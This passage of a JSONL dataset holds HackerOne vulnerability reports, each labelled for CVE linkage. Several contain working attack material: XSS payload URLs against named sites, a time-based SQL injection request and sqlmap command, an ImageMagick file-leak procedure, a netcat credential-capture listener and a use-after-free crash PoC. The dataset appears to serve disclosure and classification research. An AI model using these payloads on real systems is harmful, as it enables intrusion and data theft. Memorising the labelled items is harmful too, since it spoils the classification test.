Delete the ethereum object, which deletes provider.get().\n3. Call isUnlocked(), which will point to the deleted provider.get() pointer.\n\nHere is a PoC (Proof of Concept) that can crash the renderer process:\n```\nfunction triggerGC() {\n for (let i = 0; i < 100; i++) {\n let a = new Array(1000000);\n }\n}\n\nlet uafObj = ethereum._metamask;\ndelete ethereum;\ntriggerGC();\nconsole.log(await uafObj.isUnlocked());\n```\n\nWill try to follow up with a full exploit to show code execution on the renderer process.\n\n## Impact\n\nGet code execution on the renderer process.", "source": "hackerone", "timestamp": "2023-10-11", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "458e81d08a7ffb480596", "text": "[Cross-site Scripting (XSS) - Reflected] XSS in www.shopify.com/markets?utm_source=\n\nHello, hope you are having a good day :)\n\n## Summary:\nI found a reflected XSS in `www.shopify.com/markets` using the `utm_source` parameter\n\nReflected XSS vulnerabilities arise when the application accepts a malicious input script from a user and then it is executed in the victim's browser. Since the XSS is reflected, the attacker has to trick the victim into executing the payload, usually using another website or by sending a specially crafted link\n\n##### URL: `https://www.shopify.com/markets`\n##### INJECTION POINT: `utm_source` parameter\n##### PAYLOAD: `injection%22%20style=%22animation-name:swoop-up%22%20onanimationstart=%22alert(document.domain)`\n\n## Steps To Reproduce:\nVisit this URL: \n```\nhttps://www.shopify.com/markets?utm_source=INJECTION%22%20style=%22animation-name:swoop-up%22%20onanimationstart=%22alert(document.domain)\n```\n\nBy visiting that link you'll get an alert on your screen, that demonstrates the existence of the vulnerability.\n\n{F1925617}\n\nThe attack is unauthenticated\n\n## Recommended Fix\nCorrectly escape special characters such as `<` `>` `\"` `'` based on the context where the string gets reflected.\n\nThank you.\n\n## Impact\n\nAn attacker could steal user cookies, create a trusted phishing page or bypass any CSRF protection mechanism.", "source": "hackerone", "timestamp": "2022-10-18", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "283ab771efb286dded99", "text": "[Unknown] Privilege Esacalation at Apache Airflow 2.5.1\n\nHello. I found security issue about airflow's log file. \n\nAirflow 2.5.1 sets log files to vulnerable privileges. (chmod 666)\n\nAny Linux user on the host on which the airflow operates can read and tamper with the airflow's logs.\n\nTaking advantage of this, an attacker in local host can retrieve sensitive information from a Linux host that can only access airflow accounts. ** (This is privilege escaltion from any linux account to airflow's linux account) **\n(ex : ssh private key)\n\n** The attack conditions are as follows. **\n1. An attacker can log in to a host running airflow with a specific Linux account.\n(Or the penetration test was successfully successful.)\n\n2. An attacker can log in to the airflow web server and can read the dag log.\n\n** The attack procedure is as follows. **\n\n1. After deleting a specific dag log using any account, the attacker regenerates the log file using the ssh private key of the account that runs the airflow as a symbolic link.\n{F2171182}\n\n2. The attacker logs in to the airflow webserver and reads the log.\n{F2171186}\n\n\n3. The airflow logs expose SSH PRIVATE KEY.\n\n{F2171190}\n\n\n\n## Patch History \n- https://github.com/apache/airflow/pull/29506\n- This vulnerability has been allocated CVE-2023-25754 by Apache Security Team.\n\n## Impact\n\nLocal linux user can access any file like ssh private key which owned by account which operate airflow.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "042eb43a1ded7b40fd5c", "text": "[Missing Encryption of Sensitive Data] CVE-2023-46219: HSTS long file name clears contents\n\n## Summary:\nI've discovered a significant security flaw in cURL's file handling, particularly affecting the HSTS (HTTP Strict Transport Security) database when handling long filenames. \n\n### Vulnerability Description\ncURL erroneously creates temporary files with names potentially exceeding the filesystem's maximum filename length (typically 255 bytes for ext4, etc.). If a filename used in the HSTS database is longer than 243 bytes (255 bytes minus 9 for the random suffix and 4 for the '.tmp' extension), an unexpected security error occurs, leading to the HSTS database being overwritten.\n\n### Affected Code\n\n**File: curl/lib/fopen.c**\n```c\nCURLcode Curl_fopen(struct Curl_easy *data, const char *filename, FILE **fh, char **tempname) {\n CURLcode result = CURLE_WRITE_ERROR;\n unsigned char randsuffix[9]; // Random suffix generation <=======\n ...\n tempstore = aprintf(\"%s.%s.tmp\", filename, randsuffix); // Temporary filename creation <=======\n if(!tempstore) {\n result = CURLE_OUT_OF_MEMORY;\n goto fail;\n }\n}\n```\n\n**File: curl/lib/hsts.c**\n```c\nresult = Curl_fopen(data, file, &out, &tempstore);\n...\nif(!result && tempstore && Curl_rename(tempstore, file)) // Attempt to rename temp file to actual file <======\n result = CURLE_WRITE_ERROR;\n\nif(result && tempstore)\n unlink(tempstore); // Remove temp file if error occurs\n```\n\n## Steps To Reproduce:\n\n\nFirst let’s check the correct behaviour. I’ve created simple hsts file for cxsecurity.com domain\n```bash\n$ cat ok.hsts.txt\n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\ncxsecurity.com \"20241031 12:12:12\"\n \n$ curl --hsts ok.hsts.txt http://cxsecurity.com -v\n* Switched from HTTP to HTTPS due to HSTS => https://cxsecurity.com/\n* Trying 188.114.97.1:443...\n…
\n```\n\nSo works great. Let’s try update the database and add Facebook \n \n```bash\n$ curl --hsts ok.hsts.txt https://facebook.com -v \n* Trying 31…\n* Connected to facebook.com …\n…\n< Strict-Transport-Security: max-age=15552000; preload\n…\n \n$ cat ok.hsts.txt \n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\ncxsecurity.com \"20241031 12:12:12\"\nfacebook.com \"20240430 00:11:44\"\n```\n\nThe file has been successfully updated. 
\n\nLet’s see what will happen if the user will define filename longer that 243 (let’s use the content from previous file)\n\n```bash\n$ cp ok.hsts.txt hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.txt \n```\n\nLet’s validate the file size as it will be important to prove security issue. \n\n```bash\n$ ls -la hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.txt \n-rw-r--r-- 1 cx cx 179 Nov 1 19:14 hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.txt\n```\n\nwe have 179 bytes.\n\nIf the user will use such file, curl will reset the content due to improper rename action\n\n```bash\n$ cat hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.h", "source": "hackerone", "timestamp": "2023-12-08", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "83b349cd020a316c01d5", "text": "[Path Traversal] (CVE-2023-32004) Permission model bypass by specifying a path traversal sequence in a Buffer\n\nhttps://nodejs.org/en/blog/vulnerability/august-2023-security-releases#permission-model-bypass-by-specifying-a-path-traversal-sequence-in-a-buffer-highcve-2023-32004\n\nhttps://hackerone.com/reports/2038134\n\nAlso, patch was provided in the report and matched https://github.com/nodejs/node/commit/1f64147eb607f82060e08884f993597774c69280 (excluding tests).\n\n## Impact\n\nsee reports.", "source": "hackerone", "timestamp": "2023-10-07", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "067ba8372f75dad8e8e7", "text": "[Uncontrolled Resource Consumption] [CVE-2022-44570] Possible Denial of Service Vulnerability in Rack’s Range header parsing\n\nI made a report and patch at https://hackerone.com/reports/1668717.\n\nhttps://discuss.rubyonrails.org/t/cve-2022-44570-possible-denial-of-service-vulnerability-in-racks-range-header-parsing/82125\n> There is a possible denial of service vulnerability in the Range header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44570.\n>Carefully crafted input can cause the Range header parsing component in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that deal with Range requests (such as streaming applications, or applications that serve files) may be impacted.\n\n## Impact\n\nReDoS occurs when crafted values are sent to request headers.\nEspecially in Rails, access to public directories is affected.\n\nIt was possible to attack ReDoS on many servers without authentication, but in the case of this regular expression, if it is ruby 3.2 or higher, there is a memoization countermeasure, so it is not a threat.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "04b3f894ad34cb62d066", "text": "[Remote File Inclusion] [CVE-2022-44268] Arbitrary Remote Leak via ImageMagick\n\n**Summary:**\nHackerOne's image upload is using ImageMagick to convert/resize images and is likely updated. Thus, it's vulnerable to CVE-2022-44268.\n\n**Description:**\n\n\n### Steps To Reproduce\n1. Navigate to your profile\n2. Edit and upload the attached image (`im-lfi.png`) as your profile picture\n3. Save changes and download the resized picture\n4. Issue the following command to view the downloaded image's profile data;\n```bash\nidentify -verbose image.png\n```\nThen, copy the `Raw profile type:` and decode it using any tool or using Python like;\n```bash\npython -c \"print(bytes.fromhex('2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a').decode())\"\n```\n\nI've attached the resized image too which contains the content of /etc/passwd i.e. 86bca9490b71a481329efc85de3a82a98f6c29475f4926fd2b5fc844b96899c0.png\n\n## Impact\n\nArbitrary Remote Leak", "source": "hackerone", "timestamp": "2023-03-16", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a1e89429383892c5fdd5", "text": "[Unknown] ReDoS (Rails::Html::PermitScrubber.scrub_attribute)\n\nI reported at https://hackerone.com/reports/1684163\n\nhttps://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-5x79-w82f-gw8w\n\n> Certain configurations of rails-html-sanitizer < 1.4.4 use an inefficient regular expression that is susceptible to excessive backtracking when attempting to sanitize certain SVG attributes. This may lead to a denial of service through CPU resource consumption.\n\nIt seems that the same problem existed on the Loofah side, so it was fixed as well. That has been fixed as CVE-2022-23514(https://github.com/flavorjones/loofah/security/advisories/GHSA-486f-hjj9-9vhh)\n\n## Impact\n\nReDoS may occur if scrub is executed in Rails::Html::PermitScrubber.", "source": "hackerone", "timestamp": "2022-12-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "231ce774e207aae78e1d", "text": "[Cross-site Scripting (XSS) - Stored] HTML injection that may lead to XSS on HackerOne.com through H1 Triage Wizard Chrome Extension\n\nTo reproduce:\n\n* ensure you have the H1 Triage Wizard Chrome extension enabled\n* visit https://hackerone.com/reports/1622449?subject=security&/bugs=1\n* right-click the report, select \"View Triage Questionnaire (Beta)\"\n* observe an HTML payload being injected\n\n{F2173699}\n\nThe payload is stored in █████████. The contents of this file are dynamically loaded through the Chrome extension.\n\nThe vulnerability is caused by the following code in the `triage-extension-private` repository:\n\n```js\nbuildTriageQuestionnaireModal = (\n modalElement,\n triageQuestionnaireModalOptions\n) => {\n let questionnaireResponses =\n triageQuestionnaireModalOptions.questionnaireResponses;\n if (questionnaireResponses) {\n modalElement.innerHTML = triageQuestionnaireHTML\n .replace(\"{{handle}}\", triageQuestionnaireModalOptions.handle) // <-- the handle here is taken from the subject parameter (i.e. \"security\")\n .replace(\"{{1}}\", questionnaireResponses[1]) // <-- the response to the questionnaire is interpolated without sanitizing it\n .replace(\"{{2}}\", questionnaireResponses[2]) // <-- this applies to all of these\n .replace(\"{{3}}\", questionnaireResponses[3])\n// ...\n```\n\n## Impact\n\nThis vulnerability may lead to compromising confidential information or impact its integrity.", "source": "hackerone", "timestamp": "2023-02-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "9e54978d46ac8f45b66a", "text": "[Cross-site Scripting (XSS) - Reflected] Jolokia Reflected XSS\n\n## Summary:\n\n(salam)\nHi team i hope you are well , after doing some recon on mars.com i saw that the website use jolkia 1.3.5 it's vulnerable to reflected XSS \n\n## Steps To Reproduce:\n\n 1. Vuln Link : https://couponsmanager-uat.b2b.mars.com/jolokia/read%3Csvg%20onload=alert(document.cookie)%3E?mimeType=text/html\n\n## Supporting Material/References:\nCVE-2018-1000129\n\nJolkia - Version\n{F1957663}\n\n\n##POC \n\n{F1957668}\n\n## Impact\n\nIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:\nPerform any action within the application that the user can perform.\nView any information that the user is able to view.\nModify any information that the user is able to modify.\nInitiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.", "source": "hackerone", "timestamp": "2022-10-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "d572c18671cff80ce31f", "text": "[Privilege Escalation] Subdomain Takeover at course.oberlo.com\n\nHi,\nI was able to takeover your subdomain `course.oberlo.com` via using `kajabi` services.\n\n## `Poc :`\n\nvisit https://course.oberlo.com/ you will see my poc \n\nhttps://web.archive.org/web/20220904143512/https://course.oberlo.com/\n\n\n\n## `Suggested Fix :`\n\nClear your subdomain DNS.\n\n## Impact\n\nSubdomains Takeovers can be use in many things :\nMalware\nPhishing / Spear phishing\nXSS\nAuthentication bypass\nOpen Redirects\nTrue access\n.. etc\n\n\n****************************************\nKind Regards,\nMohamed Haron.", "source": "hackerone", "timestamp": "2022-12-01", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e1587fb19a6ab5470861", "text": "[Improper Access Control - Generic] AWS Credentials Disclosure at ███\n\nHi team!!\nI found the config.json file, which contains sensitive information of AWS.\n\nPOC:\nhttps://███████/config.json\n```\n{\"aws\": {\n \"accessKeyID\": \"███████\",\n \"secretAccessKey\": \"██████████\",\n \"region\": \"███\",\n \"bucket\": \"██████\",\n \"endpoint\": \"https://s3.amazonaws.com\"\n },\n \"serverSettings\": {\n \"port\": 443,\n \"timeout\": 18000000\n },\n \"█████████\": {\n \"authorizationURL\": \"https://████/ms_oauth/oauth2/endpoints/oauthservice/authorize\",\n \"tokenURL\": \"https://████/ms_oauth/oauth2/endpoints/oauthservice/tokens\",\n \"clientID\": \"██████████\",\n \"clientSecret\": \"█████\",\n \"callbackURL\": \"https://████████/callback\",\n \"userProfileURL\": \"https://███/ms_oauth/resources/userprofile/me\"\n }\n}\n```\n\n## Impact\n\nBy using leaked AWS credentials or abusing credentials with misconfigured permissions, an attacker could try to gain access to sensitive information on the AWS account or perform arbitrary modification on the AWS resources.\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Use a browser to navigate to: https://██████/config.json\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "a3dc38929ce9d6f84679", "text": "[Server-Side Request Forgery (SSRF)] Mail app - Blind SSRF via Sierve server fonctionnality and sieveHost parameter\n\nHi everyone,\nI would like to report another Blind SSRF vulnerability through the Nextcloud Mail application.\n\nTested on latest Mail release : `2.0.1`\n\n## Steps To Reproduce:\n\nFirstly, this report is similar to #1736390 except that it touches a new parameter and a different endpoint.\n\nWhen adding a filter via a sieve filter server (`mail` application => added mailbox => settings => Sieve filter server), the following request is made : \n\n```\nPUT /apps/mail/api/sieve/account/5 HTTP/2\nHost: redacted\nCookie: redactedr\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0\nAccept: application/json, text/plain, */*\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nRequesttoken: redacted\nContent-Length: 117\nOrigin: redacted\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\n{\"sieveEnabled\":true,\"sieveHost\":\"evil.org\",\"sievePort\":\"80\",\"sieveUser\":\"\",\"sievePassword\":\"\",\"sieveSslMode\":\"none\"}\n```\n\nThe SSRF is found in the `sieveHost` parameter, and provided that the `sieveSslMode` parameter is set to `none`.\n\n```\n{\"sieveEnabled\":true,\"sieveHost\":\"127.0.0.1\",\"sievePort\":\"80\",\"sieveUser\":\"\",\"sievePassword\":\"\",\"sieveSslMode\":\"none\"}\n```\n\nVia the Burp Intruder tool, I will guess the open ports on my Nextcloud server. Response time less than 100ms => closed port. Response time higher than 5000ms = open ports and service listening on them.\n\n{F1992720}\n\nResult from Burp Intruder on my NC server : \n\n{F1992724}\n\n```\nPort 80 - Apache2 service\nPort 443 - Apache2 service\nPort 2222 - SSH ! (critical)\nPort 6060 - CrowdSec\nPort 8080 - CrowdSec\nPort 3306 - MySQL\nPort 5432 - PostgreSQL\nPort 6379 - My Redis instance for Nextcloud\n```\n\n## Impact\n\nFrom [OWASP](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/):\n\n> SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL).\n\nThis vulnerability can allow a malicious individual to map the server and the company's internal network via Nextcloud. This is not demonstrated here in the report but one can scan private subnet ranges to try to guess : \n\n- Which IP addresses are responding\n- Wich ports are open \n- Tried to exploit vulnerable services through this Blind SSRF\n\nHere are some examples of Blind SSRF, which were used as a rebound, to exploit more critical vulnerabilities :\n\n[Here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) is an example of how to use an SSRF blind, as a rebound, to exploit a critical flaw.\n\nLooking forward to exchanging.\n\nRegards,\nSupr4s", "source": "hackerone", "timestamp": "2023-02-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "c2991877b0da57a6a067", "text": "MiniDVBLinux 5.4 Config Download Exploit\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2022-10-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "21b0f7d8908ceb2acd9c", "text": "[Insufficiently Protected Credentials] CVE-2022-27774: Credential leak on redirect\n\n## Summary:\nCurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.\n\n## Steps To Reproduce:\n\n 1. Configure for example Apache2 on `firstsite.tld` to perform redirect with mod_rewrite:\n ```\n RewriteCond %{HTTP_USER_AGENT} \"^curl/\"\n RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]\n ```\n 2. Capture credentials at `secondsite.tld` for example with:\n ```\n while true; do echo -e \"220 pocftp\\n331 plz\\n530 bye\" | nc -v -l -p 9999; done\n ```\n 3. `curl -L --user foo https://firstsite.tld/redirectpoc`\n 4. The entered password is visible in the fake FTP server:\n```\nListening on 0.0.0.0 9999\nConnection received on somehost someport\nUSER foo\nPASS secretpassword\n```\n\nThere are several issues here:\n1. The credentials are sent to a completely different host than the original host (`firstsite.tld` vs `secondsite.tld`). This is definitely not what the user could expect, considering the documentation says:\n> When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it will not be able to intercept the user+password. See also --location-trusted on how to change this.\n2. The redirect crosses from secure context (HTTPS) to insecure one (FTP). That is the credentials are unexpectedly sent over insecure channels even when the URL specified is using HTTPS.\n\nI believe the credentials should not be sent in this case unless if `--location-trusted` is used.\n\nIt might even be sensible to consider making curl stop sending credentials over downgraded security by default even when `--location-trusted` is used. Maybe there could be some option that could be used to enable such downgrade if the user REALLY wants it.\n\n## Impact\n\nLeak of confidential information (user credentials).", "source": "hackerone", "timestamp": "2022-04-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3ddc709024927196ac4d", "text": "[Cross-site Scripting (XSS) - Generic] xss on reset password page\n\ntarget:https://█████/Default.aspx?TabId=81&ctl=SendPassword&returnurl=%252fUOTSHelpDesk\n\nWhen a user goes on the forget password page and enters a username it is reflected onto the page. An attacker could simply enter a username like and it would execute an alert not to mention there is no csrf protection allowing a attacker to possibly chain csrf with this and cause alot of harm.\n\n\nreferences:\nhttps://owncloud.com/security-advisories/reflected-xss-in-login-page-forgot-password-functionallity/\nhttps://hackerone.com/reports/125059\n\n## Impact\n\nan attacker could steal cookies from a user social engineer them or redirect them\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\ngo to https://████/Default.aspx?TabId=81&ctl=SendPassword&returnurl=%252fUOTSHelpDesk\nenter a payload in username field\n\n## Suggested Mitigation/Remediation Actions\nput a character limit and sanitize user input", "source": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "023c252a6b35cbf3fd6b", "text": "[Heap Overflow] CVE-2023-38545: socks5 heap buffer overflow\n\n# Summary:\n\nThe SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:\n\n1. The request is made via socks5h.\n2. The state machine's negotiation buffer is smaller than ~65k.\n3. The SOCKS server's \"hello\" reply is delayed.\n4. The attacker sets a final destination hostname larger than the negotiation\nbuffer.\n\nlibcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames larger than 255 but will not due to a state machine bug.\n\nFor example tor user running libcurl app with follow location that connects to rogue onion server that replies with payload in `Location:` header which causes crash or worse.\n\n# Walkthrough:\n\n`do_SOCKS` initializes local variable `socks5_resolve_local` depending on the `CURLPROXY_` name. There are two relevant names for this state machine:\n\n- `CURLPROXY_SOCKS5` (SOCKS5 with local resolve of dest host)\n- `CURLPROXY_SOCKS5_HOSTNAME` (SOCKS5 with remote resolve of dest host)\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L573-L574)\n~~~c\n bool socks5_resolve_local =\n (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;\n~~~\n\nFor this scenario, `CURLPROXY_SOCKS5_HOSTNAME` is the name and `socks5_resolve_local` is initialized FALSE.\n\nThe `do_SOCKS` state machine is entered for the first time for the connection. `sx->state` is `CONNECT_SOCKS_INIT` (which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets `socks5_resolve_local` to TRUE.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L588-L593)\n~~~c\n /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */\n if(!socks5_resolve_local && hostname_len > 255) {\n infof(data, \"SOCKS5: server resolving disabled for hostnames of \"\n \"length > 255 [actual len=%zu]\", hostname_len);\n socks5_resolve_local = TRUE;\n }\n~~~\n\nThe local variable `socks5_resolve_local` is changed but, because this is a state machine, subsequent calls to `do_SOCKS` are in a different state and do not make the same change. ==**This is the bug.**==\n\nFor this scenario, the hostname is longer than 255 characters and `do_SOCKS` is on a subsequent call, which means `socks5_resolve_local` remains FALSE. This can happen by chance or be forced by an attacker.\n\nThe client \"hello\" SOCKS packet contains available methods and is sent to the server. State `CONNECT_SOCKS_READ_INIT` => `CONNECT_SOCKS_READ` is entered to parse the server \"hello\" packet (method selection reply). The server has not yet replied so `do_SOCKS` returns `CURLPX_OK`.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L640-L662)\n~~~c\nCONNECT_SOCKS_READ_INIT:\n case CONNECT_SOCKS_READ_INIT:\n sx->outstanding = 2; /* expect two bytes */\n sx->outp = socksreq; /* store it here */\n /* FALLTHROUGH */\n case CONNECT_SOCKS_READ:\n presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,\n \"initial SOCKS5 response\");\n if(CURLPX_OK != presult)\n return presult;\n else if(sx->outstanding) {\n /* remain in reading state */\n return CURLPX_OK;\n }\n else if(socksreq[0] != 5) {\n failf(data, \"Received invalid version in initial SOCKS5 response.\");\n return CURLPX_BAD_VERSION;\n }\n else if(socksreq[1] == 0) {\n /* DONE! No authentication needed. Send request. */\n sxstate(sx, data, CONNECT_REQ_INIT);\n goto CONNECT_REQ_INIT;\n }\n~~~\n\nOn a subsequent call `do_SOCKS` is in the same state where it's waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto `CONNECT_REQ_INIT` which will goto `CONNECT_RESOLVE_REMOTE` since `socks5_resolve_local` is FALSE.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L781-L797)\n~~~c\nCONNECT_REQ_INIT:\n case CONNECT_REQ_INIT:\n if(socks5_resolve_local) {\n enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port", "source": "hackerone", "timestamp": "2023-10-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "4f625c6c762abd2f3efd", "text": "[Information Exposure Through an Error Message] internal path disclosure via register error\n\n## Summary:\nHi team,\nwhen we call too many register query, we get error, in this error we can see internal path and sql query structure\n\n## Steps To Reproduce:\n1. go to register form https://valleyconnect.tva.gov/registration \n2. complete form and click on submit registration, then intercept request with burp\n3. use intruder for call multiple request, we should replace email in every request.\n\n```\nPOST /registration HTTP/2\nHost: valleyconnect.tva.gov\n\nUserName=admin&Password=jgn%25%5EThgf%23rfvHRESdy56tef&ConfirmPassword=jgn%25%5EThgf%23rfvHRESdy56tef&EmailAddress=Z%40jetamooz.com&EmailAddressVerify=Z%40jetamooz.com&FirstName=alex&LastName=jane&Initials=&Suffix=&JobTitle=it&OrganizationType=Business+Partner&OrganizationName=sarv&Country=792&StreetAddress=sary&City=katy&Province=titi&State=AL&ZipCode=&PhoneNumber=%28934%29+734-4364&MobilePhoneNumber=%28957%29+363-4655&TimeZone=America%2FLos_Angeles&CapAnswer=U4YIQ&CapKey=XXTxVOUWZrCz6buVtsgF2cFaPHLSCKVSRQc4z4My13Bee8JiTYVZXmiPd8zLSbMc&BeCheck=\n```\n\nresponse :\n```\n Failed to request registration. Please try again or contact support. Error: Telerik.OpenAccess.Exceptions.OptimisticVerificationException: Row not found: GenericOID@b5128f1e RegistrationRequest base_id=1f499ef7-83fa-4a77-8fd9-693b52c4db9b\nUPDATE [sf_dynamic_content] SET [last_modified] = @p0, [voa_version] = @p1 WHERE [base_id] = @p2 AND [voa_version] = @p3\nBatch Entry 0 (set event logging to all to see parameter data)\n at Telerik.Sitefinity.Data.TransactionManager.CommitTransaction(String transactionName)\n at DataAccessLayer.Classes.RegistrationRequestService.AddRegistrationRequest(RegistrationRequestEntry model) in D:\\Agent\\_work\\1825\\s\\Code\\DataAccessLayer\\Classes\\RegistrationRequestService.cs:line 193\n```\n\n## Tips:\nwe should insert fast and continuous for geting error\n\n## Supporting Material/References:\n{F2781135}\n{F2781143}\n\n## Impact\n\nImpact", "source": "hackerone", "timestamp": "2023-11-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "71fe19fbfa9ece04550a", "text": "[SQL Injection] time based SQL injection at [https://███] [HtUS]\n\nHello,\n\n##Summary\n\nwhile doing test on [`www.█████`](http://www.████████/) I’ve found that the endpoint at `/olc/setlogin.php` is vulnerable with SQL injection vulnerability\n\n##Vulnerable parameters \n\n- username\n- password\n\n##POC\n\n- using time based to verify , submit the below request\n\n```jsx\nPOST /olc/setlogin.php HTTP/1.1\nHost: www.██████\nCookie: UsafNoticeConsent=1; PHPSESSID=5r61rj890ogju3dvb5ptup2mn1; session=expiry=1657062712923491\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 74\nOrigin: https://www.██████████\nReferer: https://www.████/olc/sethomepage.html\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nTe: trailers\nConnection: close\n\n██████████'%2b(select*from(select(sleep(5)))a)%2b'&█████████\n```\n\n- we can see that the response time will be `5`\n\n{██████████]\n\n\n\n- sqlmap run command\n\n```jsx\npython3 sqlmap.py --level=5 --risk=3 --tamper=space2comment --random-agent -u https://█████████ --data=\"████████&██████\" -p username --dbms=mysql \n```\n\n- if you got message `got a 302 redirect to '[https://www.█████:443/olc/sethomepage.html](https://www.████████/olc/sethomepage.html)'. Do you want to follow? [Y/n] n`\n\npress `n` to not follow the redirection \n\n- we can se that our target parameter is vulnerable\n\n```jsx\nPOST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n\nsqlmap identified the following injection point(s) with a total of 586 HTTP(s) requests:\n---\nParameter: username (POST)\n Type: boolean-based blind\n Title: OR boolean-based blind - WHERE or HAVING clause\n Payload: username=-1559' OR 4924=4924 OR 'XiUq'='JgnT&██████████\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: █████' AND (SELECT 9612 FROM (SELECT(SLEEP(5)))xSGk) OR 'CPXv'='aouS&██████\n---\n[23:27:33] [WARNING] changes made by tampering scripts are not included in shown payload content(s)\n[23:27:33] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)\n[23:27:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.█████████'\n\n[*] ending @ 23:27:34 /2022-07-05/\n```\n\n███\n\n- add 